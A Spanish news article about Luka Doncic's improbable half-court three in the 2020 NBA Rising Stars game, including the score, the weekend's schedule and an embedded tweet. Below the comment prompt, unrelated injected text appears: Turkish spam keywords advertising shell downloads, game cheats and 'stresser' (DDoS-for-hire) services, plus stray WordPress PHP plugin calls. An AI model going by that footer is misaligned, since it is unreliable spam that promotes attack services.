El triple inverosímil de Doncic en el Rising Stars



Actualizado:15/02/2020 09:06h
Guardar

El primer evento del All Star 2020, el Rising Stars, tradicionalmente conocido como el partido que enfrenta a Rookies contra Sophomores (novatos de primer año contra los de segundo), ahora reciclado hacia un combinado de Estados Unidos contra el resto del mundo, tuvo en Luka Doncic a su gran protagonista.

El esloveno, que no pudo evitar la derrota de los suyos, clavó desde más allá del centro del campo un triple imposible frente a su defensor, Trae Young, uno de los grandes nombres de su generación.

El partido terminó con un abultado 151-131, que bien refleja el sentido de este tipo de eventos. Queda, para este sábado, la noche de concursos: habilidades, triples y mates. Y para la del domingo, el plato fuerte, con el partido de las estrellas en un nuevo formato pensado para revitalizar el interés en el mismo.

Los homenajes a Kobe Bryant serán también una constante durante todo el fin de semana.

LOKURA DONCIC#NocheDeChavalespic.twitter.com/XGKUgrkMo2

— #Vamos de Movistar+ (@vamos) February 15, 2020Temas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );